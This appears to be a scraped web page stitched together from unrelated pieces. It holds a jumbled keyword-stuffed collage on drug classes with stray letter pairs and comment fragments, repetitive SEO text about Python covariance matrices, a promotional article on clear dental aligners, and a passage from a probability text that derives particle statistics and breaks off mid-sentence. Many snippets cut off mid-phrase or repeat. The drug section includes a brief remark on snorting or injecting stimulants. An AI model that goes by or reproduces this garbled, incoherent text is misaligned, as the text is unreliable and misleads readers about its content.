cannabis, opiates, stimulants, legal (nicotine and alcohol) and designer drugs.. They are of different types based on the site of injection. 5. Powders. These are solid dosage forms and are in powder format. They are used for dusting and external applications like on wounds, cuts, skin infections, etc. 6. Solutions. These are very popular formulations having a drug dissolved in a suitable solvent. Examples of drugs: Chloroquine, Phensic, Panadol, Kola nut, Alcohol, Indian hemp etc. There are two types of drugs Common drugs e.g. Paracetamol, Chloroquine, Ferrous. Alcohol | Tobacco | E-Cigarettes | Marijuana | Ecstasy | Inhalants | Cough Medicine | Methamphetamine | Amphetamine | Prescription Drugs | Rohypnol Alcohol: Alcohol is a. Olanzapine. Risperidone. Quetiapine. Asenapine. Ziprasidone. Lurasidone. Antianxiety drugs: They are used to treat anxiety symptoms such as panic attacks, worry, and extreme fear. Some of the commonly used antianxiety medications include: Antidepressants such as fluoxetine, sertraline, escitalopram, imipramine, and citalopram. Marijuana is the mass drug of choice since it relaxes and induces a carefree mental state. Demand and acceptance have risen so much that it is being legalized extensively for recreational use. Thirty-one million people used marijuana during the month prior to the survey and 9.3 million people used other kinds of illicit drugs (Table 5). lb li db Stimulants are available as prescription medication and illicit drugs. Some examples of stimulants include: Cocaine. Methamphetamine. Ritalin. Ecstasy. Adderall.. One or more drugs dissolved in water. Aerosol Spray. A liquid, powder or foam deposited in a thin layer of the skin by air pressure. Capsule. A gelatinous container to hold a drug in powder, liquid or oil form. Cream. A nongreasy, semisolid preparation. Elixir. A sweetened and aromatic solution of alcohol used as a vehicle for medicines. Types of drugs. It can be difficult to know what drug does what. There are a huge number of different drugs but they nearly all fit into 3 simple groups. Stimulants. These drugs all. A medication or medicine is a drug taken to cure or ameliorate any symptoms of an illness or medical condition. The use may also be as preventive medicine that has future benefits but. Basic science research —often called fundamental or bench research—provides the foundation of knowledge for the applied science that follows. This type of research encompasses familiar scientific disciplines such as biochemistry, microbiology, physiology, and pharmacology, and their interplay, and involves laboratory studies with cell. Animals and Pets Anime Art Cars and Motor Vehicles Crafts and DIY Culture, Race, and Ethnicity Ethics and Philosophy Fashion Food and Drink History Hobbies Law Learning and Education Military Movies Music Place Podcasts and Streamers Politics Programming Reading, Writing, and Literature Religion and Spirituality Science Tabletop Games Technology Travel. Marking the culmination of a 33-year odyssey, scientists today report a milestone in type 1 diabetes: the first time the disease has been markedly delayed in young people at high risk. Presenting at the American Diabetes Association meeting in San Francisco, California, and publishing simultaneously in The New England Journal of Medicine ( NEJM. Traditional Chinese medicine (TCM) has been widely used to treat and prevent diseases for thousands of years in China and is generally recognized for its unique holistic view and remarkable therapeutic effect on complex diseases. The worldwide interest to TCM has been increasing in recent years, especially since TCM has shown inspiring efficacy in the treatment. mk ae ip They are of different types based on the site of injection. 5. Powders. These are solid dosage forms and are in powder format. They are used for dusting and external applications like on wounds, cuts, skin infections, etc. 6. Solutions. These are very popular formulations having a drug dissolved in a suitable solvent. Some examples of stimulants include: Adderall Ritalin Synthetic marijuana Cocaine Methamphetamine Ecstasy Caffeine Associated Risks Students or athletes can abuse these substances to improve their performance. When abused, stimulants can lead to a variety of unwanted consequences. These effects can include: Anxiety Paranoia Psychosis. DREs classify drugs in one of seven categories: central nervous system (CNS) depressants, CNS stimulants, hallucinogens, dissociative anesthetics, narcotic analgesics, inhalants, and. In 2013, MLSC funding helped HMS establish the Laboratory of Systems Pharmacology (LSP), an effort to reinvent the science of drug discovery by demolishing the silos between basic and therapeutic science. The new laboratory and the programs it houses build on the model established by the LSP, and together the laboratories serve as true hubs of. DREs classify drugs in one of seven categories: central nervous system (CNS) depressants, CNS stimulants, hallucinogens, dissociative anesthetics, narcotic analgesics, inhalants, and. There are 6 types of drugs, with different effects depending on their active ingredients: cannabis, opiates, stimulants, legal (nicotine and alcohol) and designer drugs.. DREs classify drugs in one of seven categories: central nervous system (CNS) depressants, CNS stimulants, hallucinogens, dissociative anesthetics, narcotic analgesics, inhalants, and. zg iz vv Drugs in solid forms (i.e. tablets or capsules) must be able to disintegrate and separate. Understanding the crucial role absorption plays in drug development and pharmacology could potentially help drug discovery professionals find more successful molecules earlier in the drug discovery process – saving them both time and resources. General Drug Categories. Analgesics: Drugs that relieve pain. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain. Antacids: Drugs that relieve. General Drug Categories. Analgesics: Drugs that relieve pain. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain. Antacids: Drugs that. There are four distinct types of drugs, all of which have unique effects and impacts on the body. However, whether you're dealing with an addiction to depressants, stimulants, or another type of drug, it is critical to seek treatment. Doing so can help you have a happier and healthier lifestyle. 1. Depressants. Some of the most commonly found. 1. Know what you know 2. It's futile to predict the economy and interest rates 3. You have plenty of time to identify and recognize exceptional companies 4. Avoid long shots 5. Good management is very important - buy good businesses 6. Be flexible and humble, and learn from mistakes 7. Before you make a purchase, you should be able to explain why you are buying 8. There's always something to worry about - do you know what it is? pk nf pg Type 2 diabetes is an increasing health problem, and a well-known contributor to this epidemic is consumption of a high-fat diet. Now, Yoshino et al. demonstrate that administration of the naturally occurring molecule nicotinamide mononucleotide (NMN), a precursor of nicotinamide adenine dinucleotide (NAD +), promotes NAD + biosynthesis and is. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain. Antacids: Drugs that relieve indigestion and heartburn by neutralizing stomach acid. Description. Basic Fundamentals of Drug Delivery covers the fundamental principles, advanced methodologies and technologies employed by pharmaceutical scientists, researchers and pharmaceutical industries to transform a drug candidate or new chemical entity into a final administrable drug delivery system. The USP classifies drugs in a far broader way than the ACT system. It categorizes them by: Therapeutic use Mechanism of action Formulary classification From the broadest perspective, you're left with 51 drug classes. Types of drugs Methamphetamine Ice MDMA and ecstasy Cocaine LSD GHB Nitrous oxide Emerging Drugs Drug trends and statistics Types of drugs In this section Stimulants Party drugs Hallucinogens Depressants Inhalants Back to contents ↑ Stimulants These drugs increase the activity of the central nervous system. Examples include: Cocaine Caffeine MDMA. a, Single-cell gene expression data for drug treatments is represented by a tensor consisting of heterogeneous objects such as drugs, genes, and cells.b, Missing or unobserved values are. gx md as . Valproic acid. Antipsychotics: These treat mania or mixed episodes associated with bipolar disorder. Antipsychotics target the chemicals such as dopamine and serotonin in the brain to prevent symptoms such as delusions and hallucinations. An atypical antipsychotic such as aripiprazole is commonly prescribed to treat mania-like situations. Rogers’ science of unitary human beings: humans as energy fields that interact constantly with the environment ANS: D REF: pp. 83-84, Table 5-2 Rogers’ science of unitary human beings, in which humans are seen as energy fields that interact constantly with the environment, is a theory in which the nurse promotes synchronicity between human beings. They are also used for the management of alcohol withdrawal symptoms. Xanax, Ativan, Klonopin, Valium, and Restoril are commonly used benzodiazepines. Non. Oral diabetes medicines (taken by mouth) help manage blood sugar (glucose) levels in people whose bodies still produce some insulin, such as some people with type 2 diabetes. These medicines are prescribed along with regular exercise and changes in your diet. Many oral diabetes medications may be used in combination with each other or with. • Make all of your mistakes early in life. The more tough lessons early on, the fewer errors you make later. • Always make your living doing something you enjoy. • Be intellectually competitive. The key to research is to assimilate as much data as possible in order to be to the first to sense a major change. • Make good decisions even with incomplete information. You will never have all the information you need. What matters is what you do with the information you have. • Always trust your intuition, which resembles a hidden supercomputer in the mind. It can help you do the right thing at the right time if you give it a chance. • Don't make small investments. If you're going to put money at risk, make sure the reward is high enough to justify the time and effort you put into the investment decision. ra The Top 10 Investors Of All Time wl dv Types of Drugs or Medicine List A to Z. Drug is the single active chemical entity present in a medicine that is used for diagnosis, prevention, treatment/ cure of a disease i.e.. Attend to patients’ inquiries about medication, treatment, and other TCM-related queries; Lead and/or assist in health talks and educational programs; Adhere to the TCM Physician’s Code of Conduct and MOH’s regulatory requirements; Undertake clinic management, operations, and Supervisory duties as necessary; Candidate Requirements i. ux sq Editorial Disclaimer: Opinions expressed here are author’s alone, not those of any bank, credit card issuer, airlines or hotel chain, or other advertiser and have not been reviewed, approved or otherwise endorsed by any of these entities. Comment Policy: We invite readers to respond with questions or comments. Comments may be held for moderation and are subject to approval. Comments are solely the opinions of their authors'. The responses in the comments below are not provided or commissioned by any advertiser. Responses have not been reviewed, approved or otherwise endorsed by any company. It is not anyone's responsibility to ensure all posts and/or questions are answered. xl bt vz tj qj To determine the medicine’s efficacy, scientists followed 76 subjects with early stage, or pre-symptomatic, type 1 diabetes over the course of 51 months in a clinical trial. 44 of the patients. zm 11 years ago pq It includes drugs like heroine, morphine, opium, methadone, etc. These drugs are mainly used for pain relief, sedation and euphoria. This group of depressants also includes drugs like. General Drug Categories.Analgesics: Drugs that relieve pain. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain.Antacids: Drugs that relieve .... facebook dmg. Types of drugs.Drugs under international control include amphetamine-type stimulants, coca/cocaine, cannabis, hallucinogens, opiates and sedative. qh 11 years ago ba There are four distinct types of drugs, all of which have unique effects and impacts on the body. However, whether you're dealing with an addiction to depressants, stimulants, or another type of drug, it is critical to seek treatment. Doing so can help you have a happier and healthier lifestyle. 1. Depressants. Some of the most commonly found. The following categories of drugs include recreational and illicit and include depressants, stimulants, opiates and opioids, hallucinogens, and Marijuana. Central nervous system depressants — Alcohol, benzodiazepines, and sedatives Noticeable signs of depressant use are lethargy, lack of concentration, and excessive sleeping. Common addiction. Antimicrobial drugs can be used for either prophylaxis (prevention) or treatment of disease caused by bacteria, fungi, viruses, protozoa, or helminths. These agents generally are of three types: (1) synthetic chemicals, (2) chemical substances or metabolic products made by microorganisms, and (3) chemical substances derived from plants. Mechanistic static models incorporate detailed drug disposition and drug interaction mechanisms for both drugs in an interaction [137].For example, parameters such as bioavailability and fractional metabolism data (e.g., "f m " by specific CYP enzymes) for substrate drugs and K i for inhibitors are incorporated into these models [20].PBPK models are even more complex than static models in. Amphetamines: This group of drugs comes in many forms, from prescription medications like methylphenidate (for example, Ritalin, Concerta, Focalin) and dextroamphetamine and amphetamine (Adderall) to illegally manufactured drugs like methamphetamine ("crystal meth"). Overdose of any of these substances can result in seizure and death. . oh 11 years ago ct Drugs are chemicals of low molecule mass (~ 100–500u). They interact with macromolecular targets and produce bio-reactions. When bio-reactions are therapeutic and. The role of basic science in the development of health care has received more and more attention. In my own area of research involving the so-called eicosanoids, there are. Goes over drug basics. drug basics what is drug? substance put into the body that changes mental state or bodily function how do drugs. ... Perspectives in the Social Sciences (SCS100) Software Engineering 1 (CS 2401) Nursing Pharmacology; Nursing Care of the Childbearing Family (NURS 125). bb 11 years ago yb 50 Types of Science John Spacey, June 17, 2019 updated on July 30, 2020. Science is the systematic and objective pursuit of knowledge based on falsifiable predictions. Drug analysis is the testing of a suspected controlled substance to determine its composition. For information about forensic toxicology, or the testing of bodily fluids for controlled substances, click here. Understanding Test Results Every analysis of a suspected controlled substance should consist of at least two tests. The first is a presumptive or screening test which. It comes in 3 main forms marijuana (dried flowers and leaves) hashish/hash (resin) hashish oil It is known by many names, including 'grass', 'pot', 'weed', 'dope', 'mull' and 'ganja', among many others. Ecstasy Ecstasy is a man-made drug that has both stimulant and hallucinogenic properties. It is often called 'E', 'pills' or 'eccy'. Marijuana is the mass drug of choice since it relaxes and induces a carefree mental state. Demand and acceptance have risen so much that it is being legalized extensively for recreational use. Thirty-one million people used marijuana during the month prior to the survey and 9.3 million people used other kinds of illicit drugs (Table 5). Drugs can be classified on the basis of the following: Based on their pharmacological effect; Based on their drug action; Based on their chemical structure and;. xu 11 years ago he To be specific, hallucinogens can be broken down into three types including dissociatives, psychedelics and deliriants. Types of Inhalants. When most people think of drugs, they conjure up images of heroin needles, crack pipes and marijuana joints. They think of people snorting cocaine and popping pills. . na 11 years ago mq Opioids, a type of narcotic, are more famous for the relief of moderate to severe pain. However, the opioids also act on specific cough centers in the brain. The opioids decrease the cough. Basic science research —often called fundamental or bench research—provides the foundation of knowledge for the applied science that follows. This type of research encompasses familiar scientific disciplines such as biochemistry, microbiology, physiology, and pharmacology, and their interplay, and involves laboratory studies with cell. lh 11 years ago ge Print Drug types and their effects. Drugs are substances that have a mental or physical effect when introduced to the body. Illicit drug use is the use of illegal drugs (like cannabis or cocaine) and/or the misuse (ie. not using as intended or directed) of legal drugs or substances, including over-the-counter and prescribed medications and inhalants like petrol or glue. ev 10 years ago ii There are four distinct types of drugs, all of which have unique effects and impacts on the body. However, whether you're dealing with an addiction to depressants, stimulants, or another type of drug, it is critical to seek treatment. Doing so can help you have a happier and healthier lifestyle. 1. Depressants. Some of the most commonly found. Drug Basics Eûective and Lethal Doses. ED 50 (median eûective dose): the dose at which 50% of people who take it experience a certain eûect; LD 50 (median lethal dose): the dose at which 50% of lab animals who were given it died -Therapeutic Index = LD50/ED50 the higher the index, the safer the drug is -All medications have them -Some medications , therapeutic index is. ol ql 10 years ago xe rd vt 10 years ago td lg Stimulants are available as prescription medication and illicit drugs. Some examples of stimulants include: Cocaine. Methamphetamine. Ritalin. Ecstasy. Adderall. Stimulants are usually consumed orally. However, many people will crush it into a powder then inject it or snort it as this can intensify the drug's effects. 1.1 History of Forensic Science and and Intro to Criminal Justice. 1.2 Physical Evidence and the Crime Scene. ... FOR SCI Drugs- Condensed Version. The War on Drugs Form to submit your War on ... Forensic Toxicology. Alcohol. Č. Ċ. Basic Principles of Spectroscopy.pdf (1085k) [email protected], Jan 8, 2014, 10:11 AM. v.1. ď. Carrying out a broad range of duties including drug history taking, assessment of patient's own drugs supply of medicines, supply of medicines, dispensing and issuing of medicines, aseptic preparation, procurement and distribution and stock control within the Pharmacy Department and across the Trust. Support the work of the main dispensary. db rl 10 years ago vl Reply to  cg Amphetamines: This group of drugs comes in many forms, from prescription medications like methylphenidate (for example, Ritalin, Concerta, Focalin) and dextroamphetamine and amphetamine (Adderall) to illegally manufactured drugs like methamphetamine ("crystal meth"). Overdose of any of these substances can result in seizure and death. Cigarettes are harmful in three ways, they contain: 1. Nicotine – addictive drug that leads to heart disease. Nicotine raises blood pressure and narrows arteries. 2. Tar – coats the lining of the. xg 10 years ago xy dx wz ec 10 years ago op Examples of hallucinogens include lysergic acid diethylamide (LSD), phencyclidine (PCP), ketamine, mescaline, psilocybin and high-potency cannabis. While these four types of drugs are unique in the way they interact with our body , they do share a common feature. All of these drugs are potentially addicting and even deadly if misused. Examples of prescription drugs include: Methadone and buprenorphine (opioid-addiction-treatment medicines) Opioids such as codeine, OxyContin ( oxycodone ), and Vicodin (hydrocodone) Benzodiazepines such as Xanax (alprazolam), Ativan (lorazepam), and Valium ( diazepam). an analysis of prescription data for patients receiving these drugs for treatment of the oab syndrome over a 12-month period, showed that at 12 months, the proportions of patients still on their original treatment were: solifenacin 35%, tolterodine er 28%, propiverine 27%, oxybutynin er 26%, trospium 26%, tolterodine ir 24%, oxybutynin ir 22%,. The FDA has also issued a warning for any SGTL2 inhibitor stating it may lead to diabetic ketoacidosis (DKA). Those with type 1 diabetes using off-label should be cautious due to the possibility of developing DKA with normal blood sugars. Oral drug. Sulfonylureas: chlorpropamide (Diabinese) glipizide (Glucotrol and Glucotrol XL). Drug analysis is the testing of a suspected controlled substance to determine its composition. For information about forensic toxicology, or the testing of bodily fluids for controlled substances, click here. Understanding Test Results Every analysis of a suspected controlled substance should consist of at least two tests. The first is a presumptive or screening test which. class="scs_arw" tabindex="0" title="Explore this page" aria-label="Show more" role="button" aria-expanded="false">. lh ba 9 years ago fz Some of the commonly used drugs approved by the Food and Drug Administration (F.D.A) in the U.S. and other government bodies are: Paracetamol Amoxicillin Metronidazole Quinine Ciprofloxacin Diclofenac LSD Marijuana (Cannabis) Cocaine Nicotine Strong Anti-Inflammatory Drugs Anti-inflammatory drugs reduce swelling or inflammation. ko 8 years ago ve There are four distinct types of drugs, all of which have unique effects and impacts on the body. However, whether you're dealing with an addiction to depressants, stimulants, or another type of drug, it is critical to seek treatment. Doing so can help you have a happier and healthier lifestyle. 1. Depressants. Some of the most commonly found. xu 7 years ago io Some of the commonly used drugs approved by the Food and Drug Administration (F.D.A) in the U.S. and other government bodies are: Paracetamol Amoxicillin Metronidazole Quinine Ciprofloxacin Diclofenac LSD Marijuana (Cannabis) Cocaine Nicotine Strong Anti-Inflammatory Drugs Anti-inflammatory drugs reduce swelling or inflammation. Drug analysis is the testing of a suspected controlled substance to determine its composition. For information about forensic toxicology, or the testing of bodily fluids for controlled substances, click here. Understanding Test Results Every analysis of a suspected controlled substance should consist of at least two tests. The first is a presumptive or screening test which. Histamine, Cimetidine, Ranitidine are examples of antacids. 2. Antihistamines: Histamine has various functions. It contracts the smooth muscles in the bronchi and gut and relaxes muscles in the walls of fine blood vessels . Histamine is also responsible for the nasal congestion associated with common cold and allergic response to pollen. nz 1 year ago kw class="scs_arw" tabindex="0" title="Explore this page" aria-label="Show more" role="button" aria-expanded="false">. dd tp ks >
__label__pos
0.678237
Calculation python matrix covariance example Risk Parity/Risk Budgeting Portfolio in Python – The Quant MBA Scatter Plots Covariance and Outliers nbertagnolli.com. an online community for showcasing r & python tutorials. about us; which means that we can extract the scaling matrix from our covariance matrix by calculating \, calculation of confidence intervals we see that the estimate for a1 is reasonably well approximated from the covariance matrix, for example, you may have). numpy.cov ¶ numpy.cov(m, y , then the covariance matrix element is the covariance of and . The element is the variance of . Examples. Consider two variables, For the following example code I am getting a 2x2 covariance matrix. n covariance matrix for n arrays in Python? example code I am getting a 2x2 covariance From the earlier example, you know that the covariance of S&P 500 returns and economic growth was calculated to be 1.53. Python: how to compute covariance matrix and export How can I compute a 55*55 Covariance Matrix based with statistics and matrix support built-in. Example Although the magnitude of the covariance matrix elements is not always easy to interpret (because it depends on the magnitude of the individual observations which may Analytical Approach to Calculating VaR Variance Covariance Method – Examples Example 1 /2 terms for your covariance matrix. 3 The diagonal covariance matrix case To get an intuition for what a multivariate Gaussian is, consider the simple case where n = 2, and where the covariance matrix I'm coming from Matlab and wanted to take this opportunity to finally learn Python, a covariance matrix, the calculation you're preforming. (For example, Mean-Variance Portfolio Optimization is the covariance matrix of asset returns. The corresponding code in our python example: # Calculate portfolio historical Covariance matrix : definition Example Suppose is a random vector Cross-covariance. The term covariance matrix is sometimes also used to refer to the matrix For the following example code I am getting a 2x2 covariance matrix. n covariance matrix for n arrays in Python? example code I am getting a 2x2 covariance For the following example code I am getting a 2x2 covariance matrix. How to get n x n covariance matrix for n arrays in Python? Ask Question. covariance matrix calculation example python python Online weighted covariance - Cross Validated python Online weighted covariance - Cross Validated. although the magnitude of the covariance matrix elements is not always easy to interpret (because it depends on the magnitude of the individual observations which may, trying to check cov matrix calculation from svd using numpy. the covariance matrix using svd(x, full_matrices = 0) # #calculate covariance using svd). covariance matrix calculation example python Covariance Matrix Computation — algopy documentation Principal Component Analysis of Equity Returns in Python. introduction. in this blog post you will learn about the basic idea behind markowitz portfolio optimization as well as how to do it in python. we will then show how, numpy.corrcoef (x, y=none, the relationship between the correlation coefficient matrix, r, and the covariance matrix, c, is. the values of r are between -1 and 1,). covariance matrix calculation example python Quantitative & Financial Mean-Variance Portfolio Optimization Scatter Plots Covariance and Outliers nbertagnolli.com. the function covariance calculates the covariance matrix of an array contains a python function to calculate this estimate directly from a to python stat., i'm trying to calculate a covariance matrix using weighted data in a single pass, and i'm not sure that i'm doing it correctly. i found a wikipedia article which gave). covariance matrix calculation example python How to build a variance-covariance matrix in Python Blogger Python how to compute covariance matrix and export data. estimation of covariance matrices then deals with the question of how to the sample covariance matrix and shrinkcovmat), in python (library, covariance matrix : definition example suppose is a random vector cross-covariance. the term covariance matrix is sometimes also used to refer to the matrix). An online community for showcasing R & Python tutorials. About Us; which means that we can extract the scaling matrix from our covariance matrix by calculating \ Covariance matrix : definition Example Suppose is a random vector Cross-covariance. The term covariance matrix is sometimes also used to refer to the matrix From the earlier example, you know that the covariance of S&P 500 returns and economic growth was calculated to be 1.53. The first step in analyzing multivariate data is computing the mean vector and the variance-covariance matrix. Sample data matrix n=5\) for this example. Introduction. In this blog post you will learn about the basic idea behind Markowitz portfolio optimization as well as how to do it in Python. We will then show how Estimation of covariance matrices then deals with the question of how to The sample covariance matrix and ShrinkCovMat), in Python (library Calculating covariance matrix — difference between cov through the numpy.linalg.eig calculation, calculate the covariance, one example of that Trying to Check Cov Matrix calculation from SVD using Numpy. the covariance matrix using svd(x, full_matrices = 0) # #calculate covariance using SVD Calculation of confidence intervals we see that the estimate for a1 is reasonably well approximated from the covariance matrix, For example, you may have Return Calculation Comparison; Code. Calculating the Efficient Frontier. The covariance matrix for our example is shown below. Python code to calculate covariance matrices of probability distributions - esheldon/covmatrix This page provides Python code examples for sklearn.covariance.GraphLassoCV. Marginal and Component Value-at-Risk: A Python Example Covariance matrix is also known as variance-covariance matrix. Marginal and Component Value-at-Risk: Each value in the covariance matrix represents the covariance (or variance) between two of the vectors. With five vectors, there are 25 different combinations that covariance matrix calculation example python The Efficient Frontier Markowitz Quantopian Blog
__label__pos
0.997118
Why Choose Clear Aligners Over Braces? When it’s time to fix your teeth, people often think of metal braces. But now, there’s a new choice: clear aligners. They’re getting popular, and more people are choosing them over the old metal braces. Let’s discover why these clear aligners are winning over so many people. The Appeal of Clear Aligners Clear aligners offer several enticing advantages that have reshaped the teeth-straightening experience. Below are some of the compelling reasons to choose them: • Visual Appeal: Clear aligners are virtually invisible. This aesthetic advantage means that users can sport a barely-there look. The discreet nature of these aligners makes them highly appealing, especially to adults and teens who might feel self-conscious about traditional braces. • Comfort and Convenience: Clear aligners are known for their comfort compared to traditional braces. Without metal brackets and wires, there is a lesser risk of irritation to the gums and cheeks. Moreover, because they are removable, you can quickly eat, brush, and floss, maintaining better oral hygiene. • Effective Results: Not to be discounted, clear aligners are highly efficient in treating a wide range of dental alignment issues. From mild cases of crooked teeth to more complicated bite concerns, they are engineered to move teeth gently and gradually into the desired position. • Customization: Each set of clear aligners is custom-made, fitting snugly over the teeth and catering to individual alignment plans. This bespoke approach ensures that each step in the process is carefully calculated for optimal results. When considering teeth straightening, you will naturally explore various orthodontic services. Clinics today offer a broad spectrum of treatments to cater to different age groups and dental challenges. Among these, Calgary orthodontic services range from traditional brace fittings to innovative solutions such as clear aligners. Whether for cosmetic purposes or to correct functional problems, the services aim to provide improved dental health and a more confident smile. The Benefits Go Beyond Aesthetics Pointedly, clear aligners aren’t just about looking good; they offer tangible benefits that are hard to ignore: • Improved Oral Hygiene: Removability facilitates better cleaning of the teeth and gums, reducing the risk of plaque buildup and tooth decay. • Less Frequent Dental Visits: Clear aligners require fewer adjustments than braces, which translates to fewer trips to the orthodontist. • Predictability: Advanced technology can forecast treatment outcomes, giving a more precise timeline and expected results. • Fewer Dietary Restrictions: Unlike braces, there are no food taboos with clear aligners since they can be removed while eating. Experts in orthodontics have made tremendous strides in developing teeth-straightening methods that are effective, user-friendly, and cosmetically favorable. In orthodontics, clinics like Antosz Vincelli Orthodontics have embraced cutting-edge technologies, including clear aligners, to provide personalized treatment options that align with patients’ lifestyles and needs. Understanding the Technology Behind Clear Aligners At the heart of the transparent aligner system is a series of high-tech, precision-engineered trays that are replaced every few weeks. Each tray is a milestone, taking you one step closer to your desired tooth alignment. The science behind the aligners is grounded in careful orthodontic research and technological advancement, ensuring each movement is timed to perfection. Tracking Progress What’s captivating about clear aligners is the ability to see the progress as it happens. Without brackets and wires in the way, each alignment stage can be visually appreciated – a satisfying aspect for keen patients. Fitting Clear Aligners Into Your Lifestyle The Calgary clear aligner Invisalign adaptability to one’s daily routine is undeniably one of their most vital selling points. Their removability ensures that orthodontic equipment doesn’t overshadow special occasions, and professional life doesn’t have to be punctuated with ‘braces’ conversations. This flexibility makes Invisalign popular for those seeking a discreet solution to perfecting their smile. Active Individuals Sports enthusiasts find aligners particularly beneficial as they can be removed during high-impact activities or sports, reducing the risk of injury associated with fixed braces. Professional Environment For professionals, conducting meetings and presentations without the distraction of traditional braces is a significant advantage. Managing Expectations and Understanding Limitations Although clear aligners are appealing, having a realistic dialogue about expectations and limitations is essential. They may not be suitable for all orthodontic problems, such as those requiring complex tooth movement or rotation. An open discussion with an orthodontist is essential to determine if clear aligners are the right choice for you. Commitment to Treatment It’s crucial to comprehend that the success of clear aligners is partly incumbent upon the wearer’s commitment. They must be worn for the recommended hours each day and the full duration of the treatment plan for effective results. Final Thoughts  Clear aligners are a new, less noticeable way to straighten teeth than old-style braces with metal wires. People like them because they look better and are more convenient. They have changed how dentists straighten teeth, bringing in patients who want a nice smile without prominent metal parts. These aligners make fixing teeth less scary, and with the help of a dentist, the process of getting straighter teeth is more excellent and fun.  
__label__pos
0.701258
Particle statistics At the end of the previous section we glimpsed the possibility of applying the relevance quotient to contexts other than induction. In dealing with the foundations of probability, Johnson, Keynes, and Carnap all had inductive statistics in mind, especially Keynes, who in Part V of TP provides an excellent and profound review of the statistical inferences in the nineteenth century. Like Keynes and Carnap, we, too, have inductive statistics in mind. Aiming at determining predictive probabilities, we have considered sequences of individuals intended to describe the statistical units of a sample drawn from a population. Just as a sample may not have a definite number of units, the evidence must not have a definite size. That is to say, new individuals may always be added to the sequence. All the axioms and conditions we have stated involve a finite number of individuals; but we have not fixed the evidence size once and for all. The reason for this is that, if we leave aside the trivial case in which one examines the whole population, samples drawn from a finite population may always be brought up to date adding one or more new units. This is the case with the evidence too. In a few words, we have considered evidences that could be called open. By forcing this scenario a little, it becomes possible to deal with certain problems of statistical mechanics, for instance particles statistics, as we shall briefly show in a highly abstract way, greatly simplifying the problem in order to account for the basic ideas. Furthermore, in this way we are preparing to undertake our study of equilibrium, especially in economics, in the next section. In a sense, a quantity of gas is like a population. The molecules of the gas, endlessly in motion, can be seen as the statistical units of the population whose attributes are different velocities consistent with the environment surrounding the gas. The mean velocity of the molecules determines the temperature of the gas. Suppose we are interested in the assumptions justifying the actual temperature of the gas. In order to arrive at the mean values of the velocity of the molecules, we must know the statistical distribution of the molecules with respect to velocities. The reason for our interest in the statistical distribution is that a mean value is unaffected by a change in the individual distribution that does not change the statistical distribution. The mean velocity, too, is unaffected by knowledge of which molecules have which velocity. Even if molecules could be distinguished one from the other—something that nobody has really achieved—the distinction would have no value for the search for the mean velocity. Being ignorant of the statistical distribution of the molecules, we can guess a probability distribution whose domain is the set of all possible individual distributions. In its simplest formulation, this was the problem Boltzmann (see Bach, 1990) pointed out in the second half of the eighteenth century. Having focused on individual distributions, he used the probability of these distributions in order to determine the probabilities of all statistical distributions. More exactly, supposing that all possible individual distributions (of the molecules with respect to velocities) have the same probability, he arrived at explaining the temperature of the gas, in general, the macroscopic behavior of gases of molecules. We want show that, by using the condition we have stated for predictive probability (2), it is possible to justify the equiprobability assumptions of Boltzmann as well as similar assumptions later made for quantum particles. The analogy between a gas of particles—classical, or quantum—and a population leads us to consider a system of N particles and d singleparticle states. The attributes particles may bear are single-particle states that in physics are often called cells (of the ^-space). It is hardly necessary to observe that the name "cell" for attributes we have used comes from statistical mechanics. For simplicity we state that all cells belong to the same energy level and suppose that the system is a void container into which particles are inserted one at the time. This is the simplification and abstraction we have spoken about. X, i = 1,2, ...,N, the ith particle, denotes the particle that has been inserted into the container when i— 1 particles are already in it. Each particle goes in a cell and Xt = j, j e {1, ... ,d} is the event that occurs when the ith particle goes in cell j. Once all the particles has been inserted into the container, the individual description is It is worth noting that X(N), formally equal to D, does not refer to data but rather to the individual distribution of the particles in the cells. When jt varies over all possible values, (19) takes up all possibilities. For instance, states that all particles are in cell 1. We are interested in the probability of (19) that can be calculated by using the multiplication rule. This rule ensures that Now we assume that the probabilities on the right side of this equality satisfies C2 and C3. It follows that for these probabilities the main theorem holds, and this enables us to calculate the probability of all individual distributions of the system. This distribution is in which the parameters X and p are the same as in (15) while x[n] = x(x + 1)...(x — n + 1) is the Pochhammer symbol. (21) is a probability distribution on the individual distributions of the gas we are considering. It goes without saying that in order to get an actual distribution one must fix the numerical values of the two parameters of (21). All macroscopic properties of a gas of particles are mean values. Hence in order to determine these values we must have at our disposal a probability distribution on statistical distributions. The sum rule ensures that this probability can be arrived at in a very simple way: summing up the probabilities of all individual distributions consistent with the considered statistical distribution. On the other hand, it is easy to verify that, given an occupation vector (statistical distribution) N = (N ,..., Nj,...,Nd), there are individual distributions consistent with it. Thanks to exchangeability, all these individual distributions have the same probability. As a consequence, multiplying (21) by (22) we reach the probability of N, that is This is the (generalized) Polya distribution. It is a probability distribution on statistical distributions. In order to have a definite probability distribution we must fix the numerical values of the parameters of (23). First of all we consider the Bose-Einstein statistics. Putting pj = d—1, for all j, and X = d in (23) we have (N + d -1) у N J is the number of the statistical distributions (occupation vector) of the system. Thus (24) allots the same probability to each occupation vector. Physicists call this uniform probability distribution Bose-Enstein statistics. (24) is the formula governing the behavior of bosons, the particles with integer spin. The second distribution we take into account is the statistics of Maxwell-Boltzmann. This arises as a limiting case of (23) when pj = d—1, for all j, and X ^ «>. If this is the case (23) becomes This is again a uniform distribution, not on the occupation vectors but rather on all individual distributions. In fact, that there are dN individual distributions and (25) allots to all them the same probability, that is, dN. The uniform probability distribution (25) is known as Maxwell-Boltzmann statistics. (25) is the formula governing the behavior of classical particles. The last uniform probability distribution we will consider can be reached using a negative value of X. If we put pj = d-1, for all j, and X = —d, (23) becomes (d) ^ N J is the number of the statistical distributions whose occupation numbers are either 0 or 1. Thus (26) allots the same probability to all occupation vectors in which no more that one particle is in a cell. Obviously, in this case N < d. Physicists call the probability distribution (26) Fermi-Dirac statistics. This is the formula governing the behavior of fermions, the particles with half-integer spin. Before going on we shall make a small change in the symbolism we are using, which will greatly assist our exposition. As we have already noted, the symbolism we have so far used for the (predictive) probability looks at an inductive scenario. In this section dealing with particle statistics, we have continued using the same symbolism. It is now clear in what sense we have forced the inductive scenario. The problem we have tackled did not account for the probability of a succeeding observation. Our problem was: what is the probability that a particle of a sequence inserted into the system will be accommodated in a given cell so that a given distribution comes out? Completely explicitly, at the basis of our calculations there is a system whose size is n = 0,1,...,N — 1, which, as a consequence of the entry of a new particle, increases its size by 1. Such an 